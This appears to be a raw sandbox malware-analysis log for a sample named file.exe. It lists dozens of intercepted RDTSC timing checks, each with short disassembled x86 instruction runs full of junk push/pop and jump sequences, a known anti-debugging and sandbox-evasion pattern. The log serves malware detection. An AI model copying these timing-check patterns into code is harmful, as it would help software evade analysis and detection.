Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCBDFF second address: FCBE0F instructions: 0x00000000 rdtsc 0x00000002 jc 00007F5344F55E06h 0x00000008 jbe 00007F5344F55E06h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCBE0F second address: FCBE14 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCF906 second address: FCF932 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F5344F55E0Ah 0x0000000d jmp 00007F5344F55E18h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCF932 second address: FCF937 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCF937 second address: FCF943 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCF943 second address: FCF947 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD25A5 second address: FD25AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD25AD second address: FD25B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD25B1 second address: FD25C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 pushad 0x00000008 jmp 00007F5344F55E0Dh 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD48C4 second address: FD48C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD48C9 second address: FD4901 instructions: 0x00000000 rdtsc 0x00000002 js 00007F5344F55E0Eh 0x00000008 jne 00007F5344F55E06h 0x0000000e push eax 0x0000000f pop eax 0x00000010 pushad 0x00000011 jmp 00007F5344F55E0Bh 0x00000016 jmp 00007F5344F55E12h 0x0000001b pushad 0x0000001c popad 0x0000001d popad 0x0000001e pop edx 0x0000001f pop eax 0x00000020 push esi 0x00000021 push eax 0x00000022 push edx 0x00000023 push edi 0x00000024 pop edi 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD4901 second address: FD4910 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jp 00007F5344E63FF6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD9B52 second address: FD9B58 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD9B58 second address: FD9B73 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5344E64005h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD9B73 second address: FD9B79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD9B79 second address: FD9B7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD9FDA second address: FDA003 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F5344F55E06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F5344F55E19h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 push eax 0x00000013 pop eax 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FDA003 second address: FDA008 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FDA13F second address: FDA148 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FDA148 second address: FDA152 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F5344E63FF6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FDA152 second address: FDA156 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FDCFF8 second address: FDD025 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5344E64009h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007F5344E63FF6h 0x00000013 jl 00007F5344E63FF6h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FDD025 second address: FDD044 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F5344F55E19h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE2DE6 second address: FE2DEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE2DEC second address: FE2DF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE1935 second address: FE1942 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007F5344E63FF6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE1942 second address: FE199B instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5344F55E06h 0x00000008 jmp 00007F5344F55E0Ah 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop eax 0x00000010 pushad 0x00000011 jmp 00007F5344F55E16h 0x00000016 push edi 0x00000017 jmp 00007F5344F55E0Fh 0x0000001c pop edi 0x0000001d pushad 0x0000001e jmp 00007F5344F55E19h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE1CB8 second address: FE1CDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F5344E64000h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e js 00007F5344E64002h 0x00000014 jno 00007F5344E63FF6h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE1E36 second address: FE1E3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE1E3A second address: FE1E40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE20D3 second address: FE20D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE2AED second address: FE2AF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE2AF1 second address: FE2B11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop ecx 0x0000000b pushad 0x0000000c jmp 00007F5344F55E10h 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE43EF second address: FE4405 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5344E64001h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FEA7E2 second address: FEA7EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FEA7EC second address: FEA7F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F5344E63FF6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FEABEA second address: FEABEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FEB142 second address: FEB153 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F5344E63FFBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FEB153 second address: FEB16B instructions: 0x00000000 rdtsc 0x00000002 jg 00007F5344F55E0Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a jne 00007F5344F55E06h 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FEB42F second address: FEB435 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FEB435 second address: FEB46C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5344F55E2Dh 0x00000008 jmp 00007F5344F55E0Fh 0x0000000d jmp 00007F5344F55E18h 0x00000012 jc 00007F5344F55E0Ch 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FEBC7E second address: FEBC84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FEBC84 second address: FEBC88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FEBC88 second address: FEBC97 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jp 00007F5344E63FF6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FEFFA7 second address: FEFFAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FEFFAF second address: FEFFB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FEF673 second address: FEF677 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FEF7B3 second address: FEF7CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5344E64008h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FEF7CF second address: FEF7EB instructions: 0x00000000 rdtsc 0x00000002 jg 00007F5344F55E06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d jmp 00007F5344F55E0Ah 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FEFCF4 second address: FEFCFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FEFCFD second address: FEFD01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF4875 second address: FF4879 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF4879 second address: FF4882 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4632C second address: F46333 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F46333 second address: F46338 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F46338 second address: F46352 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F5344E6BF46h 0x0000000a jne 00007F5344E6BF46h 0x00000010 popad 0x00000011 pushad 0x00000012 jnp 00007F5344E6BF46h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFCD41 second address: FFCD47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFB094 second address: FFB0B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5344E6BF57h 0x00000007 jo 00007F5344E6BF46h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFB0B5 second address: FFB0D5 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F5344B3260Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFB0D5 second address: FFB0D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFB0D9 second address: FFB0DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFB0DF second address: FFB0F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ja 00007F5344E6BF5Ch 0x0000000e jp 00007F5344E6BF4Eh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFB389 second address: FFB38F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFB38F second address: FFB398 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFB398 second address: FFB3B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5344B32608h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFB3B6 second address: FFB3BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFB3BB second address: FFB3C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F5344B325F6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFB3C7 second address: FFB3CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFB8F3 second address: FFB8F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFB8F9 second address: FFB8FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFBCF3 second address: FFBCF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFBCF9 second address: FFBD0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F5344E6BF4Ah 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFBD0D second address: FFBD13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFBD13 second address: FFBD3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 jbe 00007F5344E6BF5Fh 0x0000000d jmp 00007F5344E6BF59h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFBD3C second address: FFBD42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFC467 second address: FFC46D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFC46D second address: FFC476 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFCBC6 second address: FFCBCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1004DA3 second address: 1004DD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007F5344B32607h 0x0000000b popad 0x0000000c jmp 00007F5344B32601h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1004DD2 second address: 1004DD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1004958 second address: 100495E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 100495E second address: 1004992 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5344E6BF58h 0x00000009 jmp 00007F5344E6BF57h 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1004992 second address: 10049A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007F5344B325FCh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10049A4 second address: 10049BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5344E6BF57h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1007159 second address: 100715F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 100715F second address: 100716A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 100716A second address: 100716E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10134B3 second address: 10134BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F5344E6BF46h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10134BF second address: 10134C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 101D809 second address: 101D80D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 101D80D second address: 101D84F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F5344B32606h 0x0000000b jmp 00007F5344B32609h 0x00000010 popad 0x00000011 pushad 0x00000012 pushad 0x00000013 push eax 0x00000014 pop eax 0x00000015 push eax 0x00000016 pop eax 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 popad 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10206C9 second address: 10206E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5344E6BF58h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1026EAC second address: 1026EB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1026EB8 second address: 1026EBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1026EBC second address: 1026ECF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jnc 00007F5344B325F6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1026ECF second address: 1026ED3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1026ED3 second address: 1026F07 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5344B32608h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F5344B32608h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10304FE second address: 103050B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jo 00007F5344E6BF61h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10307D5 second address: 1030818 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jmp 00007F5344B32609h 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F5344B32600h 0x00000017 jmp 00007F5344B325FDh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10309A8 second address: 10309B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F5344E6BF46h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10309B4 second address: 10309C3 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F5344B325F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1031901 second address: 1031930 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F5344E6BF54h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F5344E6BF53h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10352F9 second address: 1035312 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5344B32604h 0x00000009 popad 0x0000000a rdtsc
